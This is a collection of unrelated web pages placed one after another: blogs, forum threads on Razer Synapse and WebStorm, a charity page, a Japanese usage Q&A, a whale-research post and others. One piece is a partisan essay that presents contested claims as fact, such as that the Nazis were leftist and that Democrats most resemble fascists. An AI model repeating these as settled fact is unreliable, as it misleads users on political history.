however, in Charles Blanchard’s intention.  He wanted to align Wheaton College with fundamentalism, with orthodoxy, with the fight against modernism. The question we still need to ask, though, is how much this drive for orthodoxy resulted from the dynastic structure of the college.  Did Charles Blanchard feel pressure to maintain his father’s orthodox legacy?  Did Bob Jones Jr.?  Jerry Falwell Jr.? Oppenheimer asks a good question in this article.  But we wish he had the space and the background to push it a little further. Leave a comment Leave a Reply WordPress.com Logo Google photo Twitter picture Facebook photo Connecting to %s
global_01_local_0_shard_00002368_processed.jsonl/40783
The Modern American Witch-Hunt More often than not the daily drum beat of the mainstream media is coming to look like an old fashioned witch-hunt aimed against Conservatives, MAGA folks, and those who are a threat to the Establishment (Democrat & Republican). The  most famous witch-hunt in America was the Salem Witch Trials: “The episode is one of Colonial America’s most notorious cases of mass hysteria. It has been used in political rhetoric and popular literature as a vivid cautionary tale about the dangers of isolationism, religious extremism, false accusations, and lapses in due process.” –Wikipedia I don’t think the Antifa folks on the Left who label anybody they disagree with as “Fascists” (while they act like true Fascists using violence and threats of violence) have too much problem with the idea of suspending any pretense of “due process” for Conservatives. At the same time we see the media, the new Inquisition, hounding anti-establishment Judge Roy Moore for supposedly offending some women over 38 years ago while largely ignoring the serial rapes and assaults of former President Bill Clinton: “[Juanita] Broaddrick stated that Clinton raped her and that Hillary Clinton knew about it, and tried to threaten Broaddrick into remaining silent.” -Wikipedia We can see the modern witch-hunt by Leftists most vividly on many modern college campuses. A speech by Milo Yiannopoulous, a gay Conservative activist, was canceled after Leftist violence erupted at UC-Berkely in California. Fox News has documented a number of similar incidents. Free speech by Conservatives is becoming more and more perilous. Many Leftists are now repeating the meme that just having Conservative ideas “creates a hostile space” for them. According to the Washington Post, “A fifth of undergrads now say it’s acceptable to use physical force to silence a speaker who makes ‘offensive and hurtful statements.'” So I guess today many college students believe they have a right to be the “judge, jury, and executioner” of those who’s statements and beliefs they perceive as “hurtful” to their world view. The real problem today is that more and more there is no “safe space” for civil disagreement in America and those who are largely responsible appear to be on the Left side of the political spectrum. No Freedom For Hate Speech Somewhere in America Somewhere in America Freedom of speech is not about protecting the right of free speech of those we agree with. It is about protecting the right to speak for those we hate and despise. It is the job of government, and of the police in particular, to protect and defend the right of all people to speak. Those who use violence and intimidation to silence those they dislike are Fascists in the exact meaning of the word. Fascists before WWII in Italy and Germany were famous for using violence to silence those whom they disliked. The man holding up this sign is a Fascist. Hate speech protestor This is what real hate speech looks like. Noam Chomsky, despite my personal disagreements with many of his beliefs and positions, put it very well. If we do not believe in freedom of speech for those we despise we do not believe in it at all. Noam Chomsky It seems to me today the sort of people who want to ban hate speech basically define “hate speech” as pretty much anything they disagree with or don’t understand (or don’t feel prepared to refute logically). I had an interesting discussion with my son and daughter recently. They are millennials and were telling me that the Antifa folks were justified in physically attacking and beating up people at a public rally whom they characterized as white supremacists. They justified this with this line of logic: “White supremacists like Nazis advocate the genocide of inferior people. They want to gas blacks like the Nazis gassed the Jews in WWII.” I am fairly certain that the vast majority of so-called “white supremacists” don’t want to gas black people and, although some may hold views I find personally despicable, are not in the same league as the Nazis who really did murder millions of people in concentration camps. I would say to these people, as I said to my son and daughter, “You need to find out what these people truly believe and then use rational arguments to refute them based on facts, not fictions based on your own prejudices.” Using violence first is always the naked admission that you don’t have good arguments, at least good arguments that will win the hearts and minds of rational people. Are there bad people out there that hold bad views? Of course there are. But if your first response is to use violence against people exercising their constitutional right to free speech just because you despise them, well, then you are an even worse person than they are. It is ok to fight Nazis and evil people, but only after those people stop talking and start using violence to get their way. Then by God get your gun and have at it, just like our fathers and grandfathers did in WWII. But not before. Fascism Defined The NAZIS or Nationalsozialistische Deutsche Arbeiterpartei in German which translated means National-Socialist German Workers’ Party. It is abbreviated in German as NSDAP – you can clearly see that on one of the flags in the far right side of this picture. Contrary to popular opinion the NAZIS were ideologically on the Left side of the political spectrum. Historians seem to have a hard time coming up with a definition of Fascism that they can agree on. My suspicion is that a large part of the problem is that many of them come to the table with their mind already made up as to what they expect to find and are just trying to line up enough facts to superficially justify that conclusion and to hell with any inconvenient facts. In America today we have a chorus from the Left that Conservatives and Republicans are Fascists. This is a symptom of the inability to define Fascism in an objective and historically accurate manner. Historically the American right has supported the traditional constitutional republic established by the Founders in the 18th century, a limited democratic form of government which now empowers almost all American adults with a say in their government, and most importantly the idea of inalienable rights to life, liberty, and the pursuit of happiness. The Republican Party was the political party of the Union in the Civil War, and without Republicans, President Lyndon B. Johnson could never have passed the Civil Rights Act of 1964. A really important point that distinguishes the right from the left in America today is that the right believes in a right to pursue happiness and the left believes that government ought to guarantee it. The right believes that it is important to protect the individual freedom to pursue happiness and left seems to believe that government should guarantee happiness for all. Individual freedom doesn’t seem very important to the left in America today. They seem more concerned with guaranteeing the outcome they feel is just and they are not in the least afraid to use the brute force of government to bend society to their will. As we will see this is exactly what classical Fascists believed. The secret of Fascism is symbolized in the ancient Roman symbol of the fasces from which the word “Fascism” comes. Roman Fasces The fasces is a bundle of sticks bound together around an axe. I wrote about this in “The Fascism of the Left Exposed Through Political Correctness”: “There are at least two important symbols here. First is the idea that a bundle of sticks bound together is much stronger than the individual sticks by themselves. Like sticks in the bundle, people in the political body must be bound by a common ideology. The second is the ax which represents a powerful central authority. “Strong central authority and a conformity which tolerates little if any dissent are the foundational principles of Fascism (as they are for all radical Leftist ideologies).” In the two classical and best known forms of Fascism of the 20th century, the German Fascism or Nazism under Adolph Hitler and the Italian Fascism under Benito Mussolini, strong central authority was wielded under a charismatic and larger-than-life dictator. Many Germans and Italians literally worshipped these men as demigods. Another relevant fact is that both of these men, Hitler and Mussolini, were clearly men of the Left to any extent that they held any principles at all. Probably their highest principle was that of power. They wanted that more than anything else. It is a fact though that Mussolini was a Socialist before he was a Fascist and the principles of Socialism and the power of the state were at the bedrock of his belief system. It is less clear with Hitler which was more important, the achieving of a Socialist society or ridding the world of the Jews. National Socialism, or as Nazism as most know it, in German is Nationalsozialistische Deutsche Arbeiterpartei which translated means National-Socialist German Workers‘ Party. It was many of the ideas of Socialism that was used by the Nazis to rally party members. In the final analysis the real religion and politics of both Hitler and Mussolini was pure and unadulterated power and they would use whatever means were available to get it. They would compromise with anyone if that led to a path that gave them power. But their rhetoric, their language, the ideals they set before the German and Italian people were ideals of the left and not the right. Now we perhaps know enough to define Fascism. First and foremost it is a political system of strong central authority where everyone is expected to toe the line of what is politically correct in the regime. Dissent is not tolerated. This correlates very well with the Left in America today which wants a big and powerful state and sanctions on those who use “hate speech” defined as anything disagreeable to the Left, anything politically incorrect. At this point there is very little difference between Fascism and Communism. Where Fascism in its classical manifestations differed from Communism was in nationalism and ideas of national destiny. The Communist mindset was more of “workers of the world unite!” One thing is certain about both Soviet Communists and German Nazis. They both were responsible for the deaths of millions of human beings. Contrary to most propaganda from the left,  racism is not a central characteristic of Fascism. Italian Fascism was not strongly racist. Genocidal racism was largely unique to Germany. The Italians only cooperated at all with the Germans in rounding up Jews after the Germans invaded Italy in 1943 after Mussolini had been deposed. Nor is racism a characteristic of the right in America. In America the one political party with the longest history of racism is the Democratic Party, the political party of the Confederacy, the political party of Jim Crow, the political party of the KKK, and now the political party that uses blacks as a political pawn to try to achieve political power. The Republican Party is the party of Abraham Lincoln and the abolition of slavery. It was votes by Republicans that were crucial to the passage of the Civil Rights Act of 1964 in America because so many Democrats voted against it. Republicans and Conservatives do not support any of the ideas of the real Fascists. If in fact there is one political party in America today that most closely resembles Fascists then that is the Democratic Party and Leftists in general. They support silencing those that disagree with them. They support a strong and powerful central government under a charismatic leader. Again the only thing that keeps them from being out and out foaming at the mouth Fascists is their anti-nationalism. In summary an accurate definition of the characteristics of Fascism would include: 1. A strong central authority headed by a charismatic leader. 2. No dissent that would make the “bundle” weaker. 3. A strong sense of nationalism and national destiny. At least two of those are characteristics of the left in America. Arguably only nationalism is a characteristic of the right, but in no way the nationalism of the historical Fascists. To love the principles that one’s country was founded on does not make one a Fascist, especially when those principles speak to individual freedom. It may have taken America a few centuries to more fully implement those principles in regards to race and gender, but it did, and that is America’s glory, not its shame.
global_01_local_0_shard_00002368_processed.jsonl/40797
Sorry, but Synapse Sucks Discussion in 'Razer Synapse' started by FrozenFireVR, Apr 19, 2018. Do you like Synapse? 1. Yes 42 vote(s) 2. No 128 vote(s) Thread Status: Not open for further replies. 1. FrozenFireVR FrozenFireVR Well-Known Member Hey Razer. Sorry to say this, but Synapse is a sad, laggy, clunky, unintuitive, ugly excuse for a control software. I've been using a Logitech G series mouse before coming across Razer and their software was amazing. Everything fit in, every control worked as expected and it was a wholesome experience, Synapse on the other hand... 2. Jayorito Jayorito Well-Known Member Nothing is wrong with synapse, I don't understand why people are having problems with it seriously could you explain. Issa_Or, pancholr, ElDiki and 7 others like this. 3. FrozenFireVR FrozenFireVR Well-Known Member It just doesn't work right. It keeps resetting settings, gives the same introduction after each update, clunky and gets stuck where the options don't reflect on the device, etc... Easy to get frustrated with these if you have used another suite before this. 4. klaus-l klaus-l Member Synapse 2 is realy the most bad software driver I have used. Logitech, Steelseries, much better. Inconvenient, uncomfortable, lacks functionality, .. Chaos with sersion 2 and 3 (beta since month) an dsupported devices. The only driver, that needs >2 seconds to recognize an application change = nearly unusable. 5. Noxxtromo Noxxtromo New Member I´m afraid, I have to agree with you! Synapse software is a mess in itself - which is kinda sad as Razer provides fine high end peripherals. Synapse is very unintuitive - and believe me, I´ve been doing this for a few years. The internal software logic is just wrong and misleading. It crashes frequently, is laggy as hell, doesn´t provide enough information, keeps loosing and not loading my profiles and sometimes changes them without any apparent reason. It is very unreliable and frustration rules. Why for example is there no simple way to turn every peripheral´s lights OFF with a simple click? Honestly, Synapse needs a complete relaunch, to become an enjoyable and fun experience. GladyNA, J.O.Z.Y, Starshaker and 9 others like this. 6. TorGor123 TorGor123 New Member I think synapse is awesome! Not only can you change the lighting profile on your devices, but you can also create your own and share them with the community. I don't really know if you can do that with Logitech, but I think that's awesome. Okay, it has it's bugs, but razer always tries to fix them! .Surf., Thorj and 0V3R_K1LL like this. 7. FrozenFireVR FrozenFireVR Well-Known Member I totally agree, it does need a complete overhaul. It would have been awesome if they used Razer themed interactive interface, but instead they chose to have a GUI styled like a kid's HTML project from the 90's (and Synapse isn't even as responsive as it would've been) :/ I barely see any point in sharing profiles. These kind of software should be quick and fluid first, those gimmicks come later (yes it's a gimmick, cause if you couldn't spend 10 minutes to customize your 'gaming' hardware, then you don't deserve to be called a gamer). Btw, you can export profiles and share them on Logitech's suite too, and if you ever used it, you won't think Synapse is awesome. 8. I actually like version 3 beta, verison 2 is clunky that is for sure. But V3 has it's bugs, the register product won't work like it did in V2. I also feel as if the profiles are a bit confusing to get the hang of. In regards to profiles for key mapping and seperate profiles for chroma lighting... just combine that stuff. GladyNA and Thorj like this. 9. TorGor123 TorGor123 New Member I think they should put everything into one application! I now have one synapse for my headset, and one synapse for my keyboard! 10. NahuelCC NahuelCC Member Not counting all the bugs, I think Synapse 3 is bloated. Why does it need 8 processes to work? Why does it need +700 MB of RAM to control my keyboard and mouse? With Synapse 2 you can disable all that crap and end up with only "Synapse2.exe" running with 60-70 MB usage, and it still works well. With Synapse 3, as soon as you disable any of those services... it stops working. 11. w9jds w9jds Active Member As a software engineer, synapse 2 is complete and utter garbage. I cry all the time looking and using it. Not only does it run terrible (crashing, not actually doing what it says, requiring more resources than it should, etc) it just never improves. Ever. Synapse 3 is an improvement but the fact that they refuse to bring old hardware to it is just stupid. Not only should it not be hard, the bigger products that would benefit from it (like the blades, which already have software issues up the ass) Just continue to get absolutely no support the second you buy it. I will give them that they are improving over the years, but their decisions and speed is pretty terrible. I have been spending years trying to see if I can get into Razer to help with software, but I continuously get denied... tuty4amxx, GladyNA, J.O.Z.Y and 13 others like this. 12. Rhwbanz Rhwbanz New Member I have to agree with the OP, Synapse 3 is a complete shambles :slightly_sad: I don't really care about editing profiles and colours once they're done, yes, Synapse 3 makes all that easy, but what I do consider essential is that Synapse detects my Tartarus and what game I'm playing properly and I'd say about 40% of the time it fails to detect I'm loading a game, forcing me to alt+tab (even worse when playing league of legends and I've wasted a flash!) and load it manually. Even worse is on several occasions it's just plain lost my profiles and had to reboot to get them to appear again. I never had these issues with Razer 2, infact I've been using my nostromo/tartarus/orbweaver/tartarus 2 for years, even when belkin made the nostromo and this is the worst software I've had to use with the little keypad. 13. Joikansai Joikansai Well-Known Member VANGUARD Don’t use Synapse beta 3 a lot, but I don’t have any issues with Synapse 2 since...I think 2015, my setting saved on laptops profiles so if I lose it I can easily recover it, but in over a year with Synapse 2 on my Blade 2017, i only did recovery one time, it was after windows update that seems somehow deleted profiles from my Blade and Razer Pheriperals setting. .Surf. and esien525 like this. 14. nekochan2117 nekochan2117 New Member I agree with you. DRIFT_IT likes this. 15. Reminds me of the thread I'd commented on a few weeks back titled "Is Razer as a company Lazy?" with a poll that had quite a mixed opinion from people 16. t_Twix t_Twix New Member i agree but only what i think sucks on synapse is synapse 3 beta.. but "legacy" synapse 2 works great even thought i just mess around with it rarely. 17. nexy33 nexy33 New Member synapse 2 was fine the only reason I have left to run it is my Kraken v2 7.1s the only thing that isn't supported out of my gear by synapse 3, but 3 is just razers software equivalent of corsair link if it works leave it alone but no they break something in it every other release .Surf. and DRIFT_IT like this. 18. awesomeammo400 awesomeammo400 New Member i own a razer keyboard since yesterday....not so bad....i like it. But the software....holy shit...what the fuck is this ? This crap dont really work well on my end... Its a shame.... 19. Predator5 Predator5 Well-Known Member They said they will bring them to Synapse 3, so they're definitely not refusing it. 20. VoorheesMMA VoorheesMMA Well-Known Member if they made it so we didnt need 2 synapse's for manowar and others id be happy .. t_Twix, ricstar, skygunner27 and 4 others like this. Thread Status: Not open for further replies. Sign In with Razer ID > Don't have a Razer ID yet? Get Razer ID >
global_01_local_0_shard_00002368_processed.jsonl/40804
Preservation Virginia Preservation Virginia, a private statewide historic preservation leader founded in 1889, is dedicated to perpetuating and revitalizing Virginia's cultural, architectural and historic heritage thereby ensuring that historic places are integral parts of the lives of present and future generations. Preservation Virginia provides leadership, experience, influence, and services to the public and special audiences by saving, managing, and protecting historic places, and developing preservation policy, programs, and strategies with individuals, organizations, and local, state, and national partners. When Preservation Virginia was founded in 1889, a branch structure was established that gave the organization a broader base of membership. Today, the Branches act as advocates for preservation in their cities, counties or regions. How Your Donation Helps 61.4% of your car donation will go toward helping Association for the Preservation of Virginia Antiquities with their project: Historic Jamestown. 38.6% will go toward the project: Preservation. • Fair • Industry trade shows • Other school related activities Tax Status IRS Classification: 501(c)(3) Public Charity established 1941 Your donations to Association for the Preservation of Virginia Antiquities are tax deductible. Grouping: Central - the organization is a central type organization (no group exemption) of a National, Regional or Geographic grouping of organizations. Donate to Preservation Virginia I agree to the Terms and Conditions
global_01_local_0_shard_00002368_processed.jsonl/40809
ES6 functions reported as error in WebStorm I'm working on a Meteor project that includes ES6, and it's not recognizing properly and reporting as error. As an example: this.autorun( () => this.subscribe('products', The first line is reporting 2 errors - both the () and the arrow function. But it works perfectly in program. I made sure in config ES6 was selected for JavaScript and it was, and made sure to import packages as library in order to make sure it was detected by Meteor if that was the issue... and still this issue persists. Very annoying that if I use ES6 the entire directory branch turns red, makes it really hard to find out if there really is an error. Any advice on how I could fix this? Comment actions Permalink works fine for me: Please try invalidating caches - does the problem persist? If yes, please attach screenshots of your settings plus the screenshot of the file with errors. Does the problem occur in .js files? Or? Comment actions Permalink I'm also having issues with formatting .vue files. This code is valid and works fine, although Webstorm is reporting errors When beautifying this code it gets even worse, effectively introducing real errors. Before going into further detail, does anyone know of any issues around es6 formatting ? Comment actions Permalink seems to be fixed with latest update WebStorm 2016.3.1 Build #WS-163.7743.51, built on November 22, 2016 Comment actions Permalink hm... not fixed. Problem randomply occurs Comment actions Permalink Please try invalidating caches (File | Invalidate caches, restart) Comment actions Permalink Invalidating caches only fixes the problem temporarily. Need to do this almost every day. No one else having this problem? Comment actions Permalink there must be some errors that lead to index corruption. Please recreate the issue and attach your idea.log Comment actions Permalink I might found a solution, the below worked for me. Webstorm > Preferences > Languages and Frameworks -> Javascript > ECMA Script6 IMPORTANT NOTE: do NOT go to Languages and Frameworks from File > Default Settings Comment actions Permalink Same goes for PHPStorm, but what I realized is the errors were  being generated from JSHint.  It looks like PHPStorm/WebStorm do not sync the version to JSHint. The fix for me: Under Code Quality Tools > JSHint, make sure " esnext" is checked. Comment actions Permalink I've been having this issue for the last year or so, the only solution is invalidating caches, sometimes that fix lasts for a few weeks, other times it only lasts a few hours. I've tried all of the solutions mentioned above in this thread. Comment actions Permalink I can think of 2 possible reasons for this behavior: - you share some files/folders between projects that have different JavaScript Language versions set: once you open both, ES6 features won't be recognized until the second project is closed and version re-set/caches invalidated ( - your indexes get broken because of some errors In the latter case, please try the following: - invalidate caches, delete all idea.log.* files - wait until the problem appears again - provide all generated idea.log.* files Comment actions Permalink JSHint was flagging (underlining) ES6 constructs until I had all of these tweaks in place: • Selected ECMAScript 6 • Invalidated caches / Restarted ... • Set JSHint "Warn about incompatibilities with the specified ECMAScript version" Select ES6 Trash the cache Set JSHint warning to ECMAScript 6 Comment actions Permalink I wanna share some experience if someone like me got here for answer and didn't find it. I've went to Settings | Languages & Frameworks | JavaScript and set it to ECMA6, but still got ES6 features underlined with red and a message that current JS version does not support them (File | Invalidate caches/restart didn't help either). I was hoping to get an answer from logs and found that Help | Show log in explorer contains rather much data, so I decided to first delete everything from  that directory. After that, I restarted WebStorm and... errors are gone. I have absolutely no idea, what happened and how is that ever possible, but if solutions provided here don't work for you, try doing the same. Comment actions Permalink Just for the ones that make the mistake I did. For WebStrorm (javascript): I imported a function named init while having a init field in the window global object (Banged my head against the wall for an hour. Maybe this saves someone's else time :)) Please sign in to leave a comment.
global_01_local_0_shard_00002368_processed.jsonl/40822
XML Sitemap URLPriorityChange frequencyLast modified (GMT) https://irfront.net/post/articles/islah-kefahaman-menuju-politik-akhlakiah/20%Monthly2014-03-01 04:32 https://irfront.net/post/events/legacy-of-the-arab-spring-the-question-of-liberty-and-democracy/20%Monthly2013-04-14 14:39
global_01_local_0_shard_00002368_processed.jsonl/40826
There are four ways to access the contents of the database: 1.  Download pre-packaged data files in Excel format 2. Using R scripts from the SOC-DRaHR repository 3.  Access customized datasets with an interactive map (requires decent networking). A static version of the data  availability is shown below. ISCN members (after logging in) use this URL to select a region and then be prompted for which type/properties of the data to download. Once this is specified, the system generates an excel workbook (xlsx) file that can be saved on the user’s machine. Note: this can take up to 10 minutes to generate large datasets. 4. Explore our new RShiny ap created by Zoey Werbin. Documentation for using and interpreting the data is available on the Dataset Information page. Don’t hesitate to contact ISCN Support if you need assistance. Your adherence to the citation and acknowledgement protocols outlined in the data policy is vital to the success of this effort. Please follow the Golden Rule for citing the data that ISCN members have shared here: cite others and they will cite you!
global_01_local_0_shard_00002368_processed.jsonl/40843
Although both means repair, but I am not able to understand the differences between them. Is it that, when human efforts are involved in repair its called 直す and when it is being repaired by any other means is called 修理 There are many, many examples of this kind. There are always different ways of saying the same thing. The 漢語 (Chinese-derived word) plus する verb is often the more formal version, whereas the simple native Japanese word is less formal. When comparing 車を直す and 車を修理する, 直す and 修理する both mean "to repair", but the latter sounds a tad more technical, but probably only because it is more formal. It's something like to perform a car maintenance operation to repair the car but both can involve human efforts. In general, however, なおす means more than just 修理する: Put the chair back where it was. to cure an ailment to remake Please correct this sentence. (See Tsuyoshi Ito's comment below.) • 2 I would add that this is very similar to English. A lot of Latin derived words are the equivalent if jukugo (of Chinese origin). – Jade Nov 2 '12 at 13:26 • 5 I am afraid that this answer is either misleading or incorrect. 修理する has a more specific meaning than 直す, and it is not just a more formal way of saying the same thing. For example, we can say 間違った答えを直す (correct a wrong answer), but we cannot say 間違った答えを修理する. (See also istrasci’s answer.) This happens in many cases: native Japanese words tend to have a more general meaning and be less formal, and Sino-Japanese words tend to have a more specific meaning and be more formal. – Tsuyoshi Ito Dec 11 '12 at 21:45 • @TsuyoshiIto There was just a question about this (with an answer from you) about whether 物 and 者 are different words. I hope you agree that 修理する and 直す are very close in meaning, when one compares 車を直す and 車を修理する. (In the sense that 車を直す often just means 車を修理する.) But of course 直す can mean much more, which I tried to hint at by mentioning 治す. I guess, you are right, though, in that なおす, even written as 直す, means more than 修理する. I'll edit my answer a little. – Earthliŋ Dec 12 '12 at 2:36 • 1 Slightly off topic, but isn't the chair example Kansaiben? I always thought that 直す used to mean 片付ける was Kansaiben? – Jeemusu Dec 12 '12 at 7:17 • @Jeemusu I guess you are right. I was trying to come up with an example that came close to EDICT's definition "(4) to replace/to put back as it was". But people from 関東 seem to use 直す in a narrower sense (closer to 修理する) than people from 関西 (or 九州), who use it an all sorts of ways, including 片付ける, which probably comes closer to 直す as "to straighten". – Earthliŋ Dec 12 '12 at 7:40 修理 means "fix/repair" and almost, if not always refers to fixing something that is physically broken. 直す can also mean "fix" as in something broken, but has more metaphorical uses. "Fix" as in correct a mistake (often seen as a compound verb 〜なおす: 書き直す to rewrite); "fix" as in straighten out, put right, etc.; "Fix" as in change/alter (a plan, etc.) 直す is a verb, and 修理 is a noun. 修理 can be made into a verb by adding する, as in 修理する, or into an adjective by adding , but it's still a noun at heart. Likewise, 直す can also be made into a noun by adding こと, but it is still a verb. Just because a language allows you to modify words into different forms shouldn't trick you into thinking they are the same thing. They have different grammatical purposes and usages. So 直す is "to fix", whereas 修理 is "a repair". Your Answer
global_01_local_0_shard_00002368_processed.jsonl/40848
Advent Day 11 – Truths About God When we received a no as our answered prayer, I struggled. Months ago, God put this on someone’s heart to include in the For All Advent study by Sacred Holidays. I am positive others have also felt like it was written just for them, too. God knew months ago how desperately I would need to revisit these truths about God. Maybe you need a reminder? I encourage you to look up these verses and read them on your own, taking your own truths from God’s active and living Word. No’s are hard to hear from God, no doubt. It is important to remember a “no” does not negate any of these Scriptures. Even when the situation is tough, God is near and God is good. Jennifer 💕 Leave a Reply You are commenting using your account. Log Out /  Change ) Google photo Twitter picture Facebook photo Connecting to %s
global_01_local_0_shard_00002368_processed.jsonl/40866
Backs of 3 or 4 humback whales surfacing Southern Ocean Connection Picture a moment that took your breath away. Can you remember the feeling of straining to view something spectacular? Did you gasp or cry out in surprised delight? Maybe you felt the excitement of others around you. Or perhaps you felt a deep sense of gratitude that you alone witnessed something beautiful. Did you feel like you could go on watching forever? Think of a moment that sparked a sense of childlike wonder, awe, and fascination. Do you have it? Close your eyes and hold on to it for a moment. That is how I felt when I saw a pod of humpback whales directly off the ship’s bow. Two humpback whales surfacing beside the ship [Credit: Marlo Garnsworthy] Five giant bodies coming up to breathe, so close it seemed like you could touch the barnacles that adorned their backs. Close enough to feel the noise of giant lungs exhaling a mix of air and salt spray. Plenty close to see that one of them was smaller than the rest—a juvenile, perhaps on its first trip to cold, productive southern waters to feed. Whales, and other wildlife for that matter, are so much more than a perk of studying and working in the Southern Ocean. They are one small (ironically) part of the complex system that we have come to study. Humpback whales are famous for their yearly equator-to-pole migrations. In the winter, the whales travel to balmy equatorial waters to breed. In the summer, they make the long journey to the poles to take advantage of rich feeding grounds supported by nutrient-rich waters upwelling from the deep ocean. Back of the whale with barnacles [Credit: Marlo Garnsworthy] You could say that we and the whales are here for a similar reason: the water. While these magnificent mammals are here to feast, we scientists are here to study. Our Scotia Sea drilling sites lie directly on top of a sediment sequence that records the interaction between the seafloor and overlying water masses through millions of years. Modern observations of Antarctic glacial systems like the Thwaites and Totten Glaciers have shown us that the temperature of water masses around Antarctica is very important in determining the ice sheet stability.  Therefore, it is critical that we understand how past changes in ocean temperature, among other factors, affected Antarctica’s glacial evolution: how it changed, when it changed, and where it changed. Because we spend many hours each day working on a specific problem or method, it’s easy for researchers to become engrossed in our individual sub-disciplines and to forget to place our science in a broader context. Maybe that’s why seeing whales up close fills me with such wonder. They remind me of the ocean that I fell in love with, the reason I got into marine science. Or maybe it’s simply that I find them fascinating. Either way, I love knowing there are moments in my working day that can take my breath away. A whale tail above the water as the whale dives [Credit: Marlo Garnsworthy] 1 Comment 1. Beautiful story and your Dad is remembering the first whale watching tours with you. So heart warming to know that you are still in awe of wonderful ocean creatures and working so hard to protect our planet for future generations. you are awesome. love you more than every drop of water in that ocean Michelle Guitard! Leave a Reply to Mike Guitard (Cancel reply)
global_01_local_0_shard_00002368_processed.jsonl/40873
2219 West Danby Road, West Danby NY 14883 2219 West Danby Road, West Danby NY 14883 An addiction—A persistent need to consume a substance or commit an act—is distinct from a compulsion, which is an overwhelming and irresistible impulse to act. Usually, a compulsive act is preceded by obsessive, intrusive thoughts that compel the person to act, whereas an addiction is more of a habit that is not necessarily accompanied by obsessive thinking. An individual experiencing either addiction or compulsions may find it helpful to speak to a mental health professional. Identifying Signs and Symptoms Compulsive behaviors include chronic gambling, alcohol and substance abuse, sexual addictions, unrestrained shopping and spending, hoarding, excessive exercising, Internet gaming, eating issues, and other behaviors. Any compulsive behavior can become an addiction when the act is no longer able to be controlled and impairs a person’s ability to function socially, academically, and professionally. The distinction between “addiction” and “compulsion” can sometimes become unclear, as a person might think frequently about the object of the addiction, and it may become near-compulsive to pursue the addictive behavior. Journey of Hope Counseling Center is a service provided by the First Baptist Church of West Danby Copyright 2019  Journey of Hope | A Website Design by Ahrens Technologies
global_01_local_0_shard_00002368_processed.jsonl/40876
William F. Buckley Now, you say is it inconsistent for a conservative to take my position. I don’t think it is, because a conservative seeks to be grounded in reality. That which works is quantifiable; that which simply does not work, isn’t. If you were to pass a law requiring people to go to church on Sunday, it wouldn’t work. Under the circumstances, you would eventually simply withdraw such a law. My position on drugs is that our drug laws aren’t working, and that more net damage is being done by their continuation than would be done by withdrawing them from the books. This, as I say, should not be confused as a sanction for drugs. Drugs are a form of escapism, and the damage in taking them is not by any means self-limited. It damages other people also. For that reason, the question is: How do you diminish the net harm done by drugs?[…] William F. Buckley, speaking in an interview on Richard Heffner’s The Open Mind on August 6th, 1996. More on various vices: • Richard Burton discusses how alcohol pushed him to the brink of death • Noam Chomsky explains what the lottery can teach us about the drug war • Former addict Will Self reflects on the death of Philip Seymour Hoffman William F Buckley
global_01_local_0_shard_00002368_processed.jsonl/40879
Unbound and Free, Gryffin is Set to Take His Music to New Heights Like the mythical creature his moniker alludes to, Gryffin a.k.a. Dan Griffith is a hybrid musician of many talents. Songs to Heal Your Millennial Heartbreak, feat. alextbh From the aftermath to the rebirth, we’ve got you covered. 5 Indie Horror Games to Play After Dark Just make sure you have your security blanket with you. Maggie Lindemann is Pop’s Latest Rebel Princess More than just a ‘Pretty Girl’, Maggie Lindemann is the new face to watch out for in alternative pop. The Best Cuts from An Honest Mistake’s Remix Album The quartet’s latest release is a compelling blend between local pop-punk and electronic dance music with music videos accompanying each song. Nguan’s Photography is a Study On Urban Ennui From Singapore to New York, Nguan’s work encapsulates the underlying solitude of living in the big city. 10 Reasons Why Joe is the Best Jonas Brother Not like you needed anymore convincing.
global_01_local_0_shard_00002368_processed.jsonl/40883
The good, the bad and the messy! I am a Latin girl in her middle twenties, sitting in her favourite coffee shop. Drinking iced latte & eating (well rather devouring) a tasty mozzarella bagel. I wonder if I should order some cheesecake too… This place has the best cheesecake, I think I will go for it. Also, WTF is the problem with these girls sitting in front of me! They have been starting at me since the moment I came in… I wonder if is because of my bright red skirt or because of my boobs. Anyway, I should be used to it by now after 4 years living here, but I still find it annoying. If I do a remembrance of the deceptions of my love life, I should go back to my early teens, when I overheard my then crush saying to someone after looked at my yearbook picture that my cheeks looked like 2 giant hams. I mean, I can’t blame him… They were big indeed, I have always had a really round face. A comment like that wouldn’t affect me today, I have learned to love my face, even with its big cheeks but at the time it hurt a LOT. But I would like to start this site with the experiences of my “grown-up” self, so all the stories will be the ones that have place after I moved to pretty, sunny (NOT) Germany around 4 years ago. The stories will be not in chronological order, as are too many, and I am sure I don’t even remember every guy I have been in a date with. So I will be writing the ones that just come to my head! Even though it would be way funnier if I just write about my most ridiculous & embarrassing dates, I think I should also give to life & Tinder some credit as I have wonderful romantic stories to tell too. So be ready because I will be spilling the tea! About all the good, the bad & the mess of my pretty much disastrous “Love/Dating Life”. See you around, Tschüssi. Leave a Reply You are commenting using your account. Log Out /  Change ) Google photo Twitter picture Facebook photo Connecting to %s
global_01_local_0_shard_00002368_processed.jsonl/40919
A Pressing Problem I was going through the comments that my friend Gina made  on my SCARAB manuscript when I found the following: “Kate presses her lips together quite a bit.  Check for this.”  Using the search function on my computer, I did just that.  Not only did Kate press her lips together quite a bit, she and a few other characters pressed their hands against their foreheads all the time.    Another writing friend, Sondy, cured me of blinking–at least for the most part.  Yes, I’ll use one or two a manuscript just like Stephen King will use the occasional adverb in a tag line.  In first drafts, however, I’ll continue to use blinking and lip-pressing all that I want.  These personal writing quirks and cliches can serve as signposts in later drafts that I want my character to react in some way. Blinking tends to be an indication of surprise while lip-pressing often means that my character would like to say something, but knows better than to blurt out the first thing that came to mind. Leave a Reply WordPress.com Logo Google photo Twitter picture Facebook photo Connecting to %s
global_01_local_0_shard_00002368_processed.jsonl/40924
